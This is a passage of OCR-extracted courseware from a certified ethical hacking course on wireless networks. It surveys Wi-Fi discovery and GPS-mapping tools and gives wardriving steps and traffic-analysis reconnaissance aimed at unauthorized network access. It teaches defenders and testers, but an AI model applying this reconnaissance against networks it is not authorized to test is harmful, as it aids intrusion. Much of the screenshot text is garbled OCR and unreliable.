2462MH1 SSID BWC p a » n a ‫׳‬k Network MpuHi;hc* pr. 9001w1ete«... Zrvai-go lippnjpoint MaikclPulseA Chsnnel 6 13 ‫וו‬ 6 8 ‫וו‬ ‫וו‬ ‫וו‬ 6 6 ‫וו‬ 5 R d !3 5«curfy Fc-juivd I a ‫׳‬1 !3 Faquiad Fegmed Feguwd FcaUicd PA9jr#d Feguicd Fequred Fequiitd Feguted F c jtiic d 1 ‘ « F » 9 jf#d A ^ ‫א ־ייי‬ RSSI Z 3 N /A |L«1 *yrm 92 □ N /A lL»c• cgrv* •96i □ 56 C J •62 ■ ‫ כ‬66 ■ j •64 ■ ‫ כ‬69 ■ ‫• כ‬70 □ 83 ‫• כ ם‬92 □ N /A iLos• iy n d 921‫־‬ □ •91 1 1 N/A 1 Ml m m J .‫! מי‬ Net 6 (d s s s ) e (D sss! G (0FDM24) G (0FDM24) G (0FDM24) G (0FDM?4| G IQFDM24) G (0FDM24) G (0FDM24) G |OFOH24| G (0FDM24) G (0FDM24) r. 1nfnM?41 A Rales Stopoirecl ‫ ו ו‬. 0/55/2.0/1 .. . ‫ ו ו‬0/55/2.0/1 54 0/48 0/36.0/ 54 0/48 0/36 0 / 54.0/48.0/36.0/.. s4n /4 8 0 /3 ; (1/ 54.0/480/36.0/.. 54 0/40 Q /X 0 / 54 0/48 0 /3 6 0 / 54 0/48 0/36.0/.. 54.0/480/36.0/.. 54 0/48 0/36 0 / s i n/1« n/TRri/ MAC Add 00 301 4 0.. 00 02 2d 0.. 00 Id 92 c.. 00 Of 651 00 1d 92 c... n n 1 1 95 8 001839 e.. 00 14 Gc e 0017311 UU 1b ‫ ו ו‬a 00 6 4 ‫ו‬c 5.. 00 ‫ ו‬217 6 ‫ רוח‬ru rp a Inf1 as(1 uc InlidMiw.•!.. Infrattrucl In fia ttttd Infrasiiuci In fio jtiict.. In fiM lnr.l Infiasuuct.. Infra&lruct Inftasiturl intiasULCt In fia iliic t.. Infiattru:! Infr A*tn r» Fisl T in *‫•י‬ ce.13.09 0613 25 0614 14 0609 54 06.09.54 ffi-fW -M C&09 54 0&09 54 0609 54 08:09:54 06.09.54 06-09 54 r » 1n ‫*י א ל‬ <

£ N tf A vo... chink 0 Av-ailuN# ICUR A M r t i\1» "‫״״״״‬ <

3 0areas xints detected (29 secute 1‫ ־‬urrsecu-eJ) 1 1‫ ־‬available

FIGURE 15.30: WirelessMon Screenshot (1 of 2)

WirebccMon Evaluation Copy
F4• Confcgv«ton H <*lp

E m

m

.

., a S i 8! » ■ ^ 0 3 0 ^ 0
CdeclNohvoikCard N ET C E A R W SI1lv3WMt»sW1elestU‫ ־‬B 2 C A 0 » « Pacte<S^«<is<Mnpcrt v ' |ndM dC«tol

SSID — MACAOdieiS

W/A U/A

|
— f c 1 5

Storgth |N/A
Sw edlM Wil N/A AJhType FfagTWeshoJd RTS (hiesfoM N/A M/A M/A

Frequency [w/s,____________ Status £ Hoi A /a O Avalctte 0 A v d o b le 0 A v a lc t*e 0 A v « l flWe 0 Avalitte 0 A v o id s ^ Not A/a. ^ £ Not Ava Not A/a. SSID CUR MaketPUseA... MDASydnor Hevoik lippirgpoinl BcP0rd9146 Komp_Robwla Bowslar QDGtD abjaWan :prngboorchp iVf-Lolct^r C 5 6 6 6 C 8 6 6 6 G 8 7 8 q A 2 Senxity Rm u i Reaii.. Rcgut Ream n»qo*« RSSI ‫ כ ם‬w a il □ -32 ‫ כ ם‬95 ■‫& כ‬ FateiSu 54 0/480 5^.0/480 5 i 0/480 5 ^0 /48 0 54 0/400 54 0/480 54.0/480 54 0/480 54 0/480 54 0/400 54 0/480 54 0/480 54 0/48 0 M r v ja n M A: Add 00 12 17 6 001311 a.. OOOb59.. 00 O t5 1.. 00 173M 001a2b1 00 24 024.. 00 179a 1 00 O 66 a 00 Id ?d3 0053719 00 21 912.. 00 1d92c n r 1» iHr■ Netvtok. 610FCM24J 6 10FCW24) G (OFCM24) 6IOFCM24I G|0rCM24J 610FCM24J 6 (OFCM24) 6 10FCM24) 6IOFCM24I GiOFCM24| 610FCM24J 6 IOFCM24! G IOFCM24) 6 m crw ?i1 Inbaelruc.. W iajttuci. Infiaaiuci.. In fia^iucl. InfiastiucL Irrfiaetiuol. Infiattiucl.. InfiastiucL. Infiattiuoi.. Inliasttuc!. Infiartiuci.. Wiastiuc!. InfiastiucL Infiattiucl ‫וי׳ו‬.•‫•^״♦׳‬ First Tine COOS 54 2. C8.0954 2. C80954 2. C6 0354 2. roo o5 4 2 . C &09952. C609582. C8 10 14 2 . re 10 28 2 . ra 1 0 x 2 C 81 03 22. ce 10 33 2. C80954 2. r R in m 7 La«t Tin. 08 1053 2. j: 10.55 2. 08 1055 2. 08 00 08 08 08 1 1 I.‫׳‬ ­‫­ ו‬ ‫זזה‬ 1055 2. ‫ ז‬055 2 1055 2. 1055 2. 1053 ‫י‬ 1047 2. 1032 2. 1053 2 10 38 2. 10552 m rw ‫י‬

‫ כ מ‬87 L J 78 R «x« 32 R rg u i. □ Rw! ‫ם‬ vj; a (L Ream R»guM Reou! R ea * Rmjlm Rm h ‫ כ ם‬n /a i l ‫ם‬ s /a i l □ ‫ם‬ n □ 'J/AIL 'j.A l .73 M/a < 1

^ No• A /a ^ N o lA /j. J AvalaN• A tM A />

21 k c k ( pototc d«t#<t#d(21 w a r • • 0 unt«tr#d)• 11 avaUbk

FIGURE 15.31: WirelessMon Screenshot (2 of 2)

Module 15 Page 2247

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

M obile-based Wi-Fi D iscovery Tool
m m ‫׳‬b L ...1 W , , i
j

Urt1fw4

CEH
ilhiul lUtbM

■c
WiFiFoFum W iFi Scanner N etw o rk Signal Info

http://www.dynamicollyloaded.com

h ttp://w w w . kaibits -software, com

OpenSignalMaps

http://km ansoft.com

http://opensignal.com
Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

M obile-based W i-F i Discovery Tool W iFiFoFum - W iF i Scanner
Source: http://www.dvnamicallvloaded.com WiFiFoFum is a mobile Wi-Fi scanner that allows you to scan the network for 802.11 Wi-Fi networks. This provides you information about each network it detects and gives detailed information about the networks SSID, MAC, RSSI (signal strength), channel, AP mode, security mode, and available transmission rates. It can scan surrounding networks, discover Internet access, gives comprehensive AP's configuration information, and this can also map APs.

Module 15 Page 2248

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Network;

Nearby

01

Radar

Logging

©

1 ?% ‫•־‬ ‫־‬.‫׳‬.

IB |
Nearby

Radar

Logging

©

I

k e llu t s 5 9 0 0 :2 2 :3 f :b 8 : a 4 : 0 c

■S K Y 3 9 6 7 S I0 0 :lb :2 f:e d :e 7 :d 0 I S p y k e W ire le s s

0 0

:1 c : d f : a 1 : e 0 : 6 a

SKY47411 0 0 :1 e :7 4 :6 2 :b 9 :3 4 NETG EAR 0 0 :H :3 3 :4 a :9 e :8 e

Kirkcoonel
0 0 :0 d : 0 b : 0 5 : b b : 9 b

FIGURE 15.32: WiFiFoFum scanning the network for 802.11 Wi-Fi networks

Network Signal Info
Source: http://www.kaibits-software.com Network Signal Info provides detailed information on your currently used network, regardless of whether you are using a Wi-Fi or a cellular connection.
*A I 1 02 0H $ >
N e tw o r k S ig n a l .
M oM * Sig n al W# 1 Sig n al

1 1 :1 9 ‫ז‬
N e tw o r k S ig n a l In fo / 0 X

E9
W iF i A M 0 6 .k

I

£
S y t le m In fo

!‫״‬ill! *
N « l op*f * 10 / S« n operator Pt»0 n *typ• K c l type N *t »treogtf> n*u % \m * 0 « U *CtiyiTy 0 0 2SM S0 3 7 1 A C 41729 Country co<k D#vtc* O O M fl IP) 192 168 0 112 £eternal IP 95 2 23 13 S 206 60 02 • 6 • disco G SM H SO PA (7 2 • 9Sd 8ro(A SU 9) fa u o o o + c ttti

‫כבש‬

a

FIGURE 15.33: Network Signal Info screenshot

Module 15 Page 2249

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

(« :» )
INT6RN6T AR6A

W iF i M anager
Source: http://kmansoft.com

WiFi Manager is software that allows you to get a full explanation of the Wi-Fi connection state that is used with a screenshot widget. You can get information about when it was switched on/off connection process, signal level presented in colors, and the current network's SSID.

WIFI Manager Premium

Settings
b I A u to

1
U p d ate

5 GHz Channels
Do not display
dBm in R a d a r m o d e

Show M lm wt l*v*ls is dBm
P la y s o u n d fo r o p e n n e tw o rk

Sound dtubled
C hoo se sound

V ib r a t e fo r o p e n n e tw o r k s

H

Vttort&on disabkd
IB S S w a r n in g


_

Warn about IBSS (AdHoc) rwtwocks no(
w o r io n f

0 0no( srtow *sum s tvir !ton
E n a b le W iF i o n s ta r t

N o tif ic a t io n ic o n

w '.

B

FIGURE 15.34: WiFi Manager Screenshot

Module 15 Page 2250

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

6?

OpenSignalMaps
Source: http://opensignal.com

This website delivers you with visualization and study-based data together with the exact signal of the service providers in a particular area with cellular coverage maps. 4 ‫♦ ׳‬
Ovtr*«w

O O frf■ 1 2 3 21 IX
IfUo

U »p

Grapli

$c»*d

C«t•

CVtrvww

.11

0
Grich

O
Scw d

t
Cells

Signal strength: 28%

« m * * rfO O (• « d B n . ‫ ״״*י‬C 1 0 8 6 7 J
Jtow m round newfey. xiuon rafitilMd. Auurat• to to 4 j g f .

Tower direction:

< = >

r^i

cd1

FIGURE 15.35: OpenSignalMaps showing the signal of service providers with cellular coverage maps

Module 15 Page 2251

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W i- F i D i s c o v e r y T o o l s
[ ■ j ib WiFi Hopper
h ttp ://w w w . w ifi hopper, com

CEH

Wellenreiter
h ttp://w ellenreiter.sourceforge.net

W a v e s tu m b le r

AirCheck Wi-Fi Tester
http://w w w .fluke ne tw o rks.com

h ttp ://w w w .cq u re .n e t

iStumbler
, , j

PW h

AirRadar 2
h ttp ://w w w . koingos w. com

h ttp ://w w w .istu m b le r.n e t

WiFinder
h ttp ://w w w .p g m s o ft. com

X ir r u s W i- F i In s p e c t o r

h ttp ://w w w .xirru s.com

Meraki WiFi Stumbler
http ://m e ra ki.co m

t&

W if i A n a ly z e r

h ttp ://a .fa rp ro c . com

Copyright © b y EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

W i-Fi Discovery Tools
Wi-Fi discovery tools can discover networks (BSS/IBSS) and detect ESSID broadcasting or % non-broadcasting networks and their W EP capabilities and the manufacturer automatically. These tools enable your Wi-Fi card to find secured and unsecured wireless connections where you are. A few of the Wi-Fi discovery tools are listed as follows: & 9 9 9 Q WiFi Hopper available at http://www.wifihopper.com Wavestumbler available at http://www.cqure.net iStumbler available at http://www.istumbler.net WiFinder available at http://www.pgmsoft.com Meraki WiFi Stumbler available at http://meraki.com

Q Wellenreiter available at http://wellenreiter.sourceforge.net 9 9 9 9 AirCheck Wi-Fi Tester available at http://www.flukenetworks.com AirRadar 2 available at http://www.koingosw.com Xirrus Wi-Fi Inspector available at http://www.xirrus.com Wifi Analyzer available at http://a.farproc.com

Module 15 Page 2252

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W ireless H acking M ethodology

CEH
UrtifM tUx*l Nm Im

The objective of the wireless hacking methodology is to compromise a Wi-Fi network in order to gain unauthorized access to network resources

C o m p ro m ise the W i-Fi N e tw o rk

C ra c k

Wi-Fi

Lau n ch W ire le ss A tta c k s

Copyright © b y

EG-G*ancil. All

Rights Reserved. Reproduction is Strictly Prohibited.

Wireless Hacking Methodology
The objective of the wireless hacking methodology is to compromise a Wi-Fi network in order to gain unauthorized access to network resources. To accomplish this objective, first you need to discover Wi-Fi networks and then perform GPS mapping of networks.

Module 15 Page 2253

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

G P S M a p p in g
Attackers create map of discovered Wi-Fi networks and create a database with statistics collected by Wi-Fi discovery tools such as Netsurveyor, NetStum blers etc.

C«rt1fW 4

CEH
ItkKjl Nm Im

W
J

J

G PS is used to track th e location o f the discovered Wi-Fi networks and the coordinates are uploaded to sites like W IG L E

Attackers can share this inform ation with the hacking to com m unity or sell it to make m oney

V 1 ____________ ►> L ^ 1I
A ttacke r n e tw o rk s

1 1 ------------ > r
Post th e GPS locations to W IG L E

D isco ve ry o f W i-F i

Copyright © b y EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

GPS M apping
GPS is funded and controlled by the Department of Defense (DOD) USA. It was especially designed for the US military, but there are many civilian users of GPS across the world. A GPS receiver calculates position, time, and velocity by processing specifically coded satellite signals of GPS. Attackers know that free Wi-Fi is available everywhere and also there may be a possibility of unsecured network presence. Attackers usually create maps of discovered Wi-Fi networks and create a database with statistics collected by Wi-Fi discovery tools such as Netsurveyor, NetStumblers, etc. GPS is used to track the location of the discovered Wi-Fi networks and the coordinates uploaded to sites like WIGLE. Attackers can share this information with the hacking to community or sell it to make money.

L eJ
A tta c k e r D is c o v e r y o f W i- F i n e tw o rk s

‫ ־י‬I r J
P o st th e G P S lo c a t io n s t o W IG L E

FIGURE 15.36: Tracking the location of the discovered Wi-Fi network and uploading it to WIGLE site

Module 15 Page 2254

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

GPS M apping Tool: W IG LE
Source: http://wigle.net WIGLE consolidates location and information of wireless networks world-wide to a central database, and provides user-friendly Java, Windows, and web applications that can map, query, and update the database via the web. Using this user can add a wireless network to WIGLE from a stumble file or by hand and add remarks to an existing network. It allows finding a wireless network by searching or browsing the interactive map.

Module 15 Page 2255

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

♦ C < 1 |D

Wigle.net/9ps/gp5/Map/onl1nefrap2/’ mapla1^39 7SS9S856&maplon^-86.02879333. &

s

Homo Download Foiums Po«t Fila Query Ssmcnshots SU JS Uploads Wob Maps

Browsable Map 0 the World
| H ,3 fd 1 ren a n |

5Wiki

Logout

Link to th|s ‫ווו‬0 ‫נן‬
T | | Map | Satellite

atrude

39 7092 to 39 3092

ngrtude -£6 0349 to -86 0077 U S Geocoding

State

-

‫־‬ ‫״‬ ‫ ־‬Zip
r_3 y_

BSSID 1 3 0 00 00 00 00 05‫־‬ Stan Year Erd Year
y

2001 ‫׳י‬ 2013[‫־‬ -

Use OpenStreetMaps 11 Possible FreeNet ° Possible Commercial Met F rst Discovered By Me First Discovered By Others I No Labels

PoM .A ir i Wit IJet
*nx*

+ ®‫“ ״‬,"•.u,

I GSM Cellular Net COMA Cellular Met lUpcatel Notes Double click or drag on map to re center Hyou zoom m far enough ssid will be displayed 2 ‫ ־‬: re mao doesnt show up try the previous or original webntaos instead v.1de voa ‫ ׳‬purple less dense yellow more dense close view red wifi low QoS green wifi high QoS blue cell tower 3 ‫ ב‬jalitv of Signal higher seen multiple times by multiple ooservers Downoad our Android App

Go gle [ search the map

FIGURE 15.37: WIGLE locating the wireless network by searching the interactive map

Module 15 Page 2256

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

ShowHg slalions 1 thiough 100 of this query |nexl100 » |
MP ‫ ־״‬rid •rid <vep trilat triloig

U ’ “ ‫״«•" '•־׳־‬ ‫יזז־ו‬ Y 0* 23 15 3C ‘9 Z9 9e 3 ‫־‬ C O O O 03 3 K 3 1 ' oc 3002 12 C OO C 00 18 20 4; 000040 2 0 10 -1 ‫־‬X 21 :oc: C O 9C 00 01 ‫ »״‬3 1 :033-08- 2 0 1 1 00• 09 92 CSC: 1 • 4e 24 23 •9 ' I :030 03 20 10 1* O C 01 non? C O X 00 1*41 19 2034 09 23C3-0327 :3 3« S3 10 1«4e *0 ‫־‬2-05- 2012-00• 2a 3* C7 04 43 10 2* 03 7 2011-08• 2011-08• 03 03 &02* 1 7 UJ 20 2‫צ‬ 2011-01•

| z

L◦ 3S 00.02X0 3;‫׳‬

m *rtt;

‫ל‬

tl

i9 75C9C8‫־׳‬C •8 0 02879333

Qtt C O 00 00 0 c C O 3*

f/RA ‫•יו־סי׳‬

!Hr■

7

*

U

37 70557730 •9 2 992 ?0 '93

'211

COOO 00 00:00.18

•o-hsc

N

05 9129:191

-83.408*1875

an

30 O C 00 D O 00 IE

XEHCX s2 >*P0 *AT 10 n

‫י *־ו‬

*

Y

N

*5 *9C070SC ■ 1 2 1 3895C9C!

)Eiv»^Q*r ■nKanniVi. 2 1! cooo 00 00-00 28 FlMMO• Mi d U B■

in*■

3

7

N

*8 57787323

■M *34*118■

00 0C 00 00 00 2E

3 ’ QAO^uMt in*• 7

Y

?3 42516891

14 84800-57

Ss> co 00 00 00 00 36 “ ‫־‬ 04 00 0C 00 00 00 3E Map

*

68 GT812CT4

12 84328201

•47*

‫י מי‬

‫ל‬

39 7837:3*4

88 ‫־‬0381135

COOO 00 03 C O 41

!•*»

3

7 00 1C 5‫י‬ 2010-11• 2010-12• 1e 23 15 5* 56 C9!* 07 2)3548- 20Cr 3 8 D C 18 3003 M 3 23 ‫ ־‬C O 43 29 p m a . :‫״>!>נ‬3.|| ||

0 00000300

0 09000000

211 C OO O 00.00.00.4* Mag

wii(1

info

‫ל‬

Y

83 1‫ נ‬1525‫ב־‬

co oo 00 .00 .co. ;‫ ■״‬ReaHSP 03917478

acne =*-'331 :•033-7*3? II II 1

1**3 II

‫ל‬

Y ||

84.337371 ‫ד‬3 33.91335187 -

l« JI

!1

FIGURE 15.38: WIGLE Screenshot

Module 15 Page 2257

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

G P S

M

a p p in g

T o o l: S k y h o o k

Skyhook's Wi-Fi Positioning System (WPS) determines location based on Skyhook's massive worldwide database of known Wi-Fi access points

<-

C

(: wvm-skytwokwirelessxomnoc. Type in your eccre-ss and cfcck Find It

rage.php

ook Location

http://www.skyhookwireless.com

Copyright © b y EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

GPS M apping Tool: Skyhook
K-Xv‫־‬ Source: http://www.skvhookwireless.com Skyhook's Wi-Fi Positioning System (WPS) determines location based on Skyhook's massive worldwide database of known Wi-Fi access points. It uses a combination of GPS tracking and a Wi-Fi positioning system for determining the location of a wireless network indoor and in urban areas. It even discovers the position of the mobile device at a distance of between 10 to 20 meters with the help of the MAC address of the nearby wireless access points and proprietary algorithms.

Module 15 Page 2258

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Q

S kyhook Location Te<hr

‫____ ץ‬

4‫־‬

C

D

w w w .skyh ookw 1reless.com

x a t io n t e ‫^ ׳‬ology/ca«»‫־‬rage.php

☆ =

Typ• in your 6ddr«ss and click Find k.

oo k Location Su p p o rt

fctV * R e J|c°

.£ n
I*
Gfm a,•'

**r.

'■ Si & g f c a /

Tm• ‫** •י‬C S l* rc a se -E > c a i« n i« N ational M orm m eA; t ?*$ +*‫■י‬ Wr-~-- - ' * o i d A
F M ‫* י‬ ■ G r a n d ./ ♦ S f • | | • G‫«׳‬r>dC*010‫׳‬f1

\ . /

Ljt■

« ‫ י‬T 4 • L

O unV M W y N M W Pul

i l a s W K j 'I S ‫י‬ M . ' ,H w e F ie fi

i ? Y JuiilMa
uJ

:
•N

r • v
t

1

; •

-

*»*‫־‬ ■ *

,

,

C o

<gle

v ‫׳‬

1

Arizona

A viio*•
Find It

uap data C2E12 Gogfltt • ‫ ׳‬m o l U w

#‫ן‬

A d d r e s s lo o k u p

235 2nd Si San Francisco CA

FIGURE 15.39: Skyhook Screenshot

Module 15 Page 2259

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W

i- F i H o ts p o t F in d e r : j iW

ir e

C E H

w jiw ire

0 o 4‫׳‬ ‫ם‬
W i- R F in d e r

-

,,‫ ן‬Q

5 :1 8

pm

@

Q.
Ust

O ptions

22 near M arket Street

Ji W ir e is a W i- Fi h o tsp o t lo catio n d ire c to ry w ith m o re th a n 788,723 fre e an d paid W i- Fi h o tsp o ts in 145 c o u n trie s http://v4.jiwire.com

Copyright © b y IG - C 0 H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

W i-F i Hotspot Finder: JiWire
Source: http://v4.jiwire.com JiWire is a Wi-Fi hotspot location directory with more than 788,723 free and paid Wi-Fi hotspots in 145 countries and it monitors your wireless connections. It is a simple way you can discover wireless Internet that small businesspeople take advantage of as well as persons working remotely. Individuals can easily browse for Wi-Fi hotspots not only based on their location, but also based on any predetermined criteria such as address, city, or ZIP code.

Module 15 Page 2260

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Jl W ITG
-■ ‫ י ל‬w m F in d e r

1 ‫*)יי*יי‬ ‫•י‬ ‫״‬ ‫*׳‬ * ■ < * ■ < « 1 c»vpi

p

I

Q

13 Free

f i 9 Pay

lip '

FIGURE 15.41: JiWire discovering free and paid Wi-Fi hotspots

Module 15 Page 2261

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W

i- F i H o ts p o t F in d e r : W

e F i

C E H
(•rtifwtf ttfciul lUchM

Wv i a * p * I www.wefi.com ‫־‬ nacs/
SEARCH \ \

235 2nd St San francisco CA

h ttp ://w w w . wefi. com
Copyright © by IC-50U!1C1I. All Rights R eserved. Reproduction is Strictly Prohibited

^ W i-Fi Hotspot Finder: W eFi
> Source: http://www.wefi.com WeFi provides you with Wi-Fi hotspot locations. It discovers the new connection and automatically connects you to the one that is the best for your needs. The desktop version will add the newly founded hotspots with the help of your system to the WeFi database automatically. You can even find nearby Wi-Fi hotspots in your vicinity with WeFi.

Module 15 Page 2262

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

FIGURE 15.38: WeFi locating Wi-Fi hotspots

Module 15 Page 2263

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

H o w to D i s c o v e r W i ‫־‬Fi N e t w o r k U s i n g W a r driving
STEP 1

*

STEP 2

STEP 3

Register w ith W IG L E and d ow nlo ad m ap packs of you r area to v ie w the plotted access points on a geographic map

Connect the antenna, G P S device to th e laptop via a U S B serial ad ap ter and board on a car

Install and launch N etStum b ler and W IG L E client so ftw are and turn on the G PS device

STEP 5

STEP 6

Drive th e car at speeds of 35 mph or b elo w (At higher speeds, Wi-Fi an ten na will not be able to d etect Wi-Fi spots)

C apture and save the N etStu m b ler log files w hich contains G PS coordinates of the access points

Upload this log file to W IG L E , w hich w ill then au tom atically plot the points onto a map

Copyright © b y

EG-Grancil. All

Rights Reserved. Reproduction is Strictly Prohibited.

‫י‬

f

How to Discover W i-F i Network Using W ardriving

Wardriving is one of the techniques used for discovering the Wi-Fi networks available in the vicinity. In order to discover Wi-Fi networks using wardriving, the user should follow these steps: Step 1: Register with WIGLE and download map packs of your area to view the plotted access points on a geographic map. Step 2: Connect the antenna and GPS device to the laptop via a USB serial adapter and put it in your car. Step 3: Install and launch NetStumbler and WIGLE client software and turn on the GPS device. Step 4: Drive the car at speeds of 35 mph or below (at higher speeds, the Wi-Fi antenna will not be able to detect Wi-Fi spots). Step 5: Capture and save the NetStumbler log files that contain GPS coordinates of the access points. Step 6: Upload this log file to WIGLE, which will then automatically plot the points onto a map.

Module 15 Page 2264

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wireless H a c k i n g M e t h o d o l o g y

C E H

■>1
■ ;

V

: ^

V

The objective of the wireless hacking methodology is to compromise a Wi-Fi network in order to gain unauthorized access to network resources

C o m p ro m ise th e W i-Fi N e tw o rk

C ra c k W i-F i E n c ry p tio n

L au n ch W ire le ss A tta c k s

Copyright © b y IG - C 0 H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

- ^ Wireless H acking Methodology
_ ® As mentioned previously, the objective of the wireless hacking methodology is to compromise a Wi-Fi network in order to gain unauthorized access to network resources. In the wireless hacking methodology, the third phase is to analyze the traffic. An attacker performs wireless traffic analysis before committing actual attacks on the wireless network. This wireless traffic analysis helps the attacker to determine the vulnerabilities in the target network.

Module 15 Page 2265

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W ir e le s s T r a ffic A n a ly s is
Identify Vulnerabilities
1. Wireless traffic analysis enables attackers to identify vulnerabilities and susceptible victims in a target wireless network 2. This helps in determining the appropriate strategy for a successful attack 3. Wi-Fi protocols are unique at Layer 2, and traffic over the air is not serialized which makes easy to sniff and analyze wireless packets

C EH
)

j

Wi-Fi Reconnaissance

Attackers analyze a wireless network to determine: ‫ י‬Broadcasted SSID ‫ י‬Presence of multiple access points ■ Possibility of recovering SSIDs * Authentication method used ‫ י‬WLAN encryption algorithms

Wireshark/Pilot Tool

CommViewTool

OmniPeek Tool

Wi-Fi packet-capture and analysis products come in a number of forms

AirMagnet Wi-Fi Analyzer

Copyright @ b y iC - G 0 U C il. All Rights Reserved. Reproduction is Strictly Prohibited.

r1 .rt.rw fu ‫״‬

Wireless Traffic Analysis
how data the and

Wireless traffic analysis provides a detailed report of the who, what, when, and of Wi-Fi activities. The traffic analysis process involves multiple tasks, such as normalization and mining, traffic pattern recognition, protocol dissection, and reconstruction of application sessions. It enables attackers to identify vulnerabilities susceptible victims in a target wireless network. The wireless traffic analysis helps Id e n t if y in g V u ln e r a b ilit ie s

Wireless traffic analysis enables attackers to identify vulnerabilities and susceptible victims in a target wireless network. It helps in determining the appropriate strategy for a successful attack. Wi-Fi protocols are unique at Layer 2, and traffic over the air is not serialized, which makes it easy to sniff and analyze wireless packets. W i- F i R e c o n n a i s s a n c e Attackers analyze a wireless network to determine: 9 9 9 9 Broadcast SSID Presence of multiple access points Possibility of recovering SSIDs Authentication method used

Module 15 Page 2266

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

9

WLAN encryption algorithms

Wi-Fi packet-capture and analysis products come in a number of forms. Several tools are available online to perform wireless traffic analysis. Examples of wireless traffic analysis tools include CommView Tool, AirMagnet Wi-Fi Analyzer, Wireshark/Pilot Tool, and OmniPeek Tool.

Module 15 Page 2267

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W 1
J

ir e le s s

C a r d s

a n d

C h ip s e t s

C E H
(•rtilwd EUk«I NMhM

Choosing the right Wi-Fi card is very important since tools like Aircrack-ng, KisMAC only works with selected wireless chipsets

Copyright © b y IC - G 0 U C il. All Rights Reserved. Reproduction is Strictly Prohibited.

Wireless Cards and Chipsets
Choosing the right Wi-Fi card is very important since tools like Aircrack-ng and KisMAC only work with selected wireless chipsets. A few considerations are mentioned here that the user should follow in order to choose the optimal Wi-Fi card. D e t e r m in e y o u r W i- F i r e q u ir e m e n ts Decide if you simply want to listen to wireless network traffic or both listen to and inject packets. Windows have the capability of only listening to network traffic but don't have the capability of injecting data packets, whereas Linux has both the listening and injecting packets capability. Based on these issues here you need to decide: © The operating system that you want to use. Q 9 Hardware format such as PCMCIA or USB, etc. And the features such as listening or injection or both. L e a r n th e c a p a b ilit ie s o f a w ir e le s s c a r d Wireless cards involve two manufacturers. One is the brand of the card and the other is the one who makes the wireless chipset within the card. It is very important to realize the difference between the two 